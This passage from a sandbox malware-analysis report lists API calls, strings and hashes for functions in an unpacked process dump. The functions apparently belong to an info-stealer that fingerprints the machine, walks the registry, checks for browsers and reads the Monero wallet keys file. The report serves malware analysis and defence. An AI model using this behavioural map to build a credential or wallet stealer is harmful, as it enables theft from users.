                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040F123
                                                        • wsprintfA.USER32 ref: 0040F150
                                                        • lstrcatA.KERNEL32(00000000,004218C8), ref: 0040F15F
                                                          • Part of subcall function 0040EFCC: GetCurrentHwProfileA.ADVAPI32(?), ref: 0040EFDC
                                                          • Part of subcall function 0040EFCC: memset.MSVCRT ref: 0040F007
                                                          • Part of subcall function 0040EFCC: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 0040F037
                                                          • Part of subcall function 0040EFCC: lstrcatA.KERNEL32(?,004218C4,?,?,?,?,?,?,?), ref: 0040F051
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040F178
                                                          • Part of subcall function 0040FC61: malloc.MSVCRT ref: 0040FC6A
                                                          • Part of subcall function 0040FC61: strncpy.MSVCRT ref: 0040FC7A
                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 0040F1A2
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindowslstrcpylstrlenmallocmemsetstrncpywsprintf
                                                        • String ID: C$MA$MA:\
                                                        • API String ID: 3155998020-3052524287
                                                        • Opcode ID: 96134a7c13c7fe6bfcde2c98474aa47bc68bf3d2856466deed113193a74471b1
                                                        • Instruction ID: 2d848902ff116a89a22e1f44bdf6b38886e53a09168c0daf1fee824345108a86
                                                        • Opcode Fuzzy Hash: 96134a7c13c7fe6bfcde2c98474aa47bc68bf3d2856466deed113193a74471b1
                                                        • Instruction Fuzzy Hash: C0313DB6900118AADB10EBF5CD85CEE7BBDEF05349B10047AF505B7191EA388E19CBB5
                                                        Function 0040E313 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 166COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ??_U@YAPAXI@Z.MSVCRT ref: 0040E322
                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00421EE4), ref: 0040E343
                                                        • memset.MSVCRT ref: 0040E385
                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 0040E4B7
                                                          • Part of subcall function 0040CEC0: strlen.MSVCRT ref: 0040CED7
                                                          • Part of subcall function 0040CA79: memcpy.MSVCRT ref: 0040CA99
                                                        Strings
                                                        • N0ZWFt, xrefs: 0040E424, 0040E431
                                                        • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040E39D, 0040E47F
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: OpenProcessmemcpymemsetstrlen
                                                        • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                                        • API String ID: 4248304612-1622206642
                                                        • Opcode ID: 684208c6a095b936ef0d6bfb6ac3a1f39db5e8be6e70be84ff7d42604b2e6e5b
                                                        • Instruction ID: 85e116ca5301e7b6a49e994c4239aa038ff77a104081d5de97b090ede7cff368
                                                        • Opcode Fuzzy Hash: 684208c6a095b936ef0d6bfb6ac3a1f39db5e8be6e70be84ff7d42604b2e6e5b
                                                        • Instruction Fuzzy Hash: 0D51B371A0011CBEDB14EBA2DC81EEEBBB8EB44358F10457FF510B22D1DA785E948B59
                                                        Function 0040EC1E Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 161registrystringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                        • RegOpenKeyExA.KERNEL32(00000000,00000000,00020019,00421414,0041E266,00421414,00421EE4), ref: 0040EC5C
                                                        • RegEnumKeyExA.KERNEL32(00421414,?,?,?,00000000,00000000,00000000,00000000,00421690), ref: 0040ECA0
                                                        • wsprintfA.USER32 ref: 0040ECCA
                                                        • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,?), ref: 0040ECE3
                                                        • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 0040ED0D
                                                        • lstrlenA.KERNEL32(?), ref: 0040ED22
                                                        • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,00421690,?,00000000,00421414,00421414), ref: 0040ED93
                                                          • Part of subcall function 0040E5C6: lstrcpyA.KERNEL32(00000000,FEE8858D,00414CC5,?,?,00401334,00414CC5,0041E266,00000000,?,00414CC5,?), ref: 0040E5EC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: OpenQueryValuelstrcpy$Enumlstrlenwsprintf
                                                        • String ID: - $%s\%s$?
                                                        • API String ID: 1989970852-3278919252
                                                        • Opcode ID: 8f76e67dbbbec65bdb4d8666fdbcbba9dcef09b6f5d0f2f58e7315307099c91d
                                                        • Instruction ID: 455061f1d10f2d0dab49b11c84cf6d7af9d99a996ee0426622621d7c49bcdec8
                                                        • Opcode Fuzzy Hash: 8f76e67dbbbec65bdb4d8666fdbcbba9dcef09b6f5d0f2f58e7315307099c91d
                                                        • Instruction Fuzzy Hash: A1511871800019ABCB11EF92DD85CEFBB7DEF14309F50046AF506B21A1EB386B59DBA4
                                                        Function 0040D931 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 310COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • StrCmpCA.SHLWAPI(00000000), ref: 0040D970
                                                        • StrCmpCA.SHLWAPI(00000000), ref: 0040D9CF
                                                        • StrCmpCA.SHLWAPI(00000000,firefox), ref: 0040DCA2
                                                        • StrCmpCA.SHLWAPI(00000000), ref: 0040DAAF
                                                          • Part of subcall function 0040E5C6: lstrcpyA.KERNEL32(00000000,FEE8858D,00414CC5,?,?,00401334,00414CC5,0041E266,00000000,?,00414CC5,?), ref: 0040E5EC
                                                        • StrCmpCA.SHLWAPI(00000000), ref: 0040DB63
                                                        • StrCmpCA.SHLWAPI(00000000), ref: 0040DBC3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy
                                                        • String ID: Stable\$FOA$firefox
                                                        • API String ID: 3722407311-3135951082
                                                        • Opcode ID: de8e23e7da3b7ca271d7102eb2a9212246e4a26a83fe02a322ef6847b29d999c
                                                        • Instruction ID: 8b6209b38485432c41fcbae6cfe5302254a6c99177a6c4752ed73c24af3f7cc3
                                                        • Opcode Fuzzy Hash: de8e23e7da3b7ca271d7102eb2a9212246e4a26a83fe02a322ef6847b29d999c
                                                        • Instruction Fuzzy Hash: AEA17371D00109BBDF14FBB2DC56AEE77A9AF50318F40093AFC01A71D2EE399618C699
                                                        Function 00401C5E Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 152stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memset.MSVCRT ref: 00401C76
                                                          • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401C8F,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 004012B4
                                                          • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000,?,?,?,00401C8F,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 004012BB
                                                          • Part of subcall function 004012A0: RegOpenKeyExA.KERNEL32(000000FF,00000000,00000000,00020119,?,?,?,?,00401C8F,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 004012D4
                                                          • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401C8F,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 004012ED
                                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00401C9A
                                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?), ref: 00401CA7
                                                        • lstrcatA.KERNEL32(?,.keys,?,?,?,?,?,?), ref: 00401CC2
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                          • Part of subcall function 0040E6E6: lstrlenA.KERNEL32(?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E6FE
                                                          • Part of subcall function 0040E6E6: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E726
                                                          • Part of subcall function 0040E6E6: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E731
                                                          • Part of subcall function 0040E64D: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BBB,00000000,?,?,00421420,?,00000000), ref: 0040E686
                                                          • Part of subcall function 0040F6C3: GetSystemTime.KERNEL32(00000000,0041E266,0041E266,00421EE4,00000000), ref: 0040F6EC
                                                          • Part of subcall function 0040E694: lstrcpyA.KERNEL32(00000000,?,0041E266,00000000,00421EE4,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6CD
                                                          • Part of subcall function 0040E694: lstrcatA.KERNEL32(?,?,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6D7
                                                          • Part of subcall function 0040E5C6: lstrcpyA.KERNEL32(00000000,FEE8858D,00414CC5,?,?,00401334,00414CC5,0041E266,00000000,?,00414CC5,?), ref: 0040E5EC
                                                          • Part of subcall function 004069B4: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00421EE4,?,?,0040B0D3,?,?,?,00421EE4), ref: 004069D2
                                                          • Part of subcall function 004069B4: GetFileSizeEx.KERNEL32(00000000,?,?,?,0040B0D3,?,?,?,00421EE4), ref: 004069E9
                                                          • Part of subcall function 004069B4: LocalAlloc.KERNEL32(00000040,?,?,0041E266,?,?,0040B0D3,?,?,?,00421EE4), ref: 00406A05
                                                          • Part of subcall function 004069B4: ReadFile.KERNEL32(?,00000000,?,0040B0D3,00000000,?,0041E266,?,?,0040B0D3,?,?,?,00421EE4), ref: 00406A1F
                                                          • Part of subcall function 004069B4: CloseHandle.KERNEL32(?,?,?,0040B0D3,?,?,?,00421EE4), ref: 00406A40
                                                        • memset.MSVCRT ref: 00401E2F
                                                          • Part of subcall function 0041296A: _MSFOpenExW.MSPDB140-MSVCRT ref: 00412A12
                                                          • Part of subcall function 0041296A: CreateThread.KERNEL32(00000000,00000000,004118D1,?,00000000,00000000), ref: 00412A27
                                                          • Part of subcall function 0041296A: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00412A2F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrcat$File$AllocCreateHeapOpenlstrlenmemset$CloseHandleLocalObjectProcessQueryReadSingleSizeSystemThreadTimeValueWait
                                                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                        • API String ID: 939244918-218353709
                                                        • Opcode ID: 9e66175d670e03b429705d70a248be1f496e67270f5c0f4356197e5962ad642a
                                                        • Instruction ID: 3c7a25a720eda5966eac3e41e4d6f773fe152a1f21db8197264e9a32e26835dc
                                                        • Opcode Fuzzy Hash: 9e66175d670e03b429705d70a248be1f496e67270f5c0f4356197e5962ad642a
                                                        • Instruction Fuzzy Hash: 8351D272D00119AACF14FBE2DD56DED737CAF14308F40093AF516B20D2EE786655CA59
                                                        Function 00414101 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrcatA.KERNEL32(?,?,00000104,?,00000104,?,00000104,?,00000104,?), ref: 00414151
                                                          • Part of subcall function 0040F84D: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0040F87B
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00414173
                                                        • lstrcatA.KERNEL32(?,?), ref: 0041418F
                                                        • lstrcatA.KERNEL32(?,?), ref: 004141A3
                                                        • lstrcatA.KERNEL32(?), ref: 004141B6
                                                        • lstrcatA.KERNEL32(?,?), ref: 004141CA
                                                        • lstrcatA.KERNEL32(?), ref: 004141DD
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                          • Part of subcall function 0040F81D: GetFileAttributesA.KERNEL32(00000000,?,?,0040AF3A,?,?,?,?), ref: 0040F82A
                                                          • Part of subcall function 00413EA0: GetProcessHeap.KERNEL32(00000000,0098967F,00000104), ref: 00413EB1
                                                          • Part of subcall function 00413EA0: HeapAlloc.KERNEL32(00000000), ref: 00413EB8
                                                          • Part of subcall function 00413EA0: wsprintfA.USER32 ref: 00413ED0
                                                          • Part of subcall function 00413EA0: FindFirstFileA.KERNEL32(?,?), ref: 00413EE7
                                                          • Part of subcall function 00413EA0: StrCmpCA.SHLWAPI(?,0041E258), ref: 00413F04
                                                          • Part of subcall function 00413EA0: StrCmpCA.SHLWAPI(?,0041E254), ref: 00413F1E
                                                          • Part of subcall function 00413EA0: wsprintfA.USER32 ref: 00413F42
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$FileHeapwsprintf$AllocAttributesFindFirstFolderPathProcesslstrcpy
                                                        • String ID: PA
                                                        • API String ID: 1968765330-1599191246
                                                        • Opcode ID: b33560bc3fb1ebf37f877c62a4775e83b6d8f06496739212d19e6438a04dc7d3
                                                        • Instruction ID: 24e9c962cc4064a49f7bc9d5865abffee12df00a2b4c30a506a9c1750c3ac59b
                                                        • Opcode Fuzzy Hash: b33560bc3fb1ebf37f877c62a4775e83b6d8f06496739212d19e6438a04dc7d3
                                                        • Instruction Fuzzy Hash: 0531D0B2C0011EBACF21FBB1DD49DCA77BCAB49304F0048B6B515E2045EA7897898FA5
                                                        Function 00404F02 Relevance: 13.6, APIs: 9, Instructions: 109networkfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040E5C6: lstrcpyA.KERNEL32(00000000,FEE8858D,00414CC5,?,?,00401334,00414CC5,0041E266,00000000,?,00414CC5,?), ref: 0040E5EC
                                                          • Part of subcall function 00403F08: ??_U@YAPAXI@Z.MSVCRT ref: 00403F34
                                                          • Part of subcall function 00403F08: ??_U@YAPAXI@Z.MSVCRT ref: 00403F3D
                                                          • Part of subcall function 00403F08: ??_U@YAPAXI@Z.MSVCRT ref: 00403F46
                                                          • Part of subcall function 00403F08: lstrlenA.KERNEL32(00000000,00000000,?,?,00421C30,ERROR), ref: 00403F60
                                                          • Part of subcall function 00403F08: InternetCrackUrlA.WININET(00000000,00000000,?,00421C30), ref: 00403F70
                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F45
                                                        • StrCmpCA.SHLWAPI(?,?,?,?,?,?,?,00000030), ref: 00404F5F
                                                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404F83
                                                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,?,?,00000030), ref: 00404FA4
                                                        • WriteFile.KERNEL32(00411E7C,?,004120A4,?,00000000,?,?,?,?,?,?,00000030), ref: 00404FCB
                                                        • InternetReadFile.WININET(00000000,?,00000400,004120A4), ref: 00404FEF
                                                        • CloseHandle.KERNEL32(00411E7C,?,00000400,?,?,?,?,?,?,00000030), ref: 00405009
                                                        • InternetCloseHandle.WININET(00000000), ref: 00405010
                                                        • InternetCloseHandle.WININET(?), ref: 00405019
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                        • String ID:
                                                        • API String ID: 2507841554-0
                                                        • Opcode ID: b6b041a9cb99b2cb741ef2ac75d15f20930762c3486d0fba7bea857fa79774f1
                                                        • Instruction ID: b920b4dea9f9038aef689a00e06664acc333fbe9db3a87c21dc70fca189dd1ca
                                                        • Opcode Fuzzy Hash: b6b041a9cb99b2cb741ef2ac75d15f20930762c3486d0fba7bea857fa79774f1
                                                        • Instruction Fuzzy Hash: D6317CB1900109BBDF20AFA2DC49EEE7BBDEF84705F10446AFA01F2191DB749A44DB64
                                                        Function 0040F249 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71commemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 0040F24E
                                                        • CoCreateInstance.OLE32(004227A8,00000000,00000001,004218D8,?,00421690,00000000,00421EE4), ref: 0040F278
                                                        • SysAllocString.OLEAUT32(NA), ref: 0040F285
                                                        • _wtoi64.MSVCRT ref: 0040F2C0
                                                        • SysFreeString.OLEAUT32(?), ref: 0040F2DB
                                                        • SysFreeString.OLEAUT32(00000000), ref: 0040F2E2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: String$Free$AllocCreateH_prologInstance_wtoi64
                                                        • String ID: NA
                                                        • API String ID: 1816492551-2333116177
